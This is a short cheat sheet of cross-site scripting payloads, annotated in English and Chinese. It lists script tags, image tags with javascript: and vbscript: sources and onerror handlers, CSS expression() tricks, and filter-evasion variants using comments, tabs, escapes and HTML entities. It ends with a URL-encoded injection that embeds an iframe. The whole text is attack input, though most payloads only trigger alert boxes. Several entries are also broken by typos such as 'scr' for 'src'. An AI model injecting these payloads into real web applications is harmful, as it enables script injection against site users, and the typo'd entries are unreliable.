<script>alert("跨站")</script> (most commonly used)
<img scr=javascript:alert("跨站")></img>
<img scr="javascript: alert(/跨站/)></img>
<img scr="javas????cript:alert(/跨站/)" width=150></img> (the gap is whitespace inserted with the Tab key)
<img scr="#" onerror=alert(/跨站/)></img>
<img scr="#" style="xss:expression(alert(/xss/));"></img>
<img scr="#"/* */onerror=alert(/xss/) width=150></img> (/**/ denotes a comment)
<img src=vbscript:msgbox ("xss")></img>
<style> input {left:expression (alert('xss'))}</style>
<div style={left:expression (alert('xss'))}></div>
<div style={left:exp/* */ression (alert('xss'))}></div>
<div style={left:\0065\0078ression (alert('xss'))}></div>
HTML entity: <div style={left:&#x0065;xpression (alert('xss'))}></div>
Unicode: <div style="{left:expRessioN (alert('xss'))}">
"]}%3Cscript%3Ealert('我又来啦!.')%3C/script%3E{[&item="]<iframe%20src=WWW.BAIDU.COM%20width=400%20height=600></iframe>["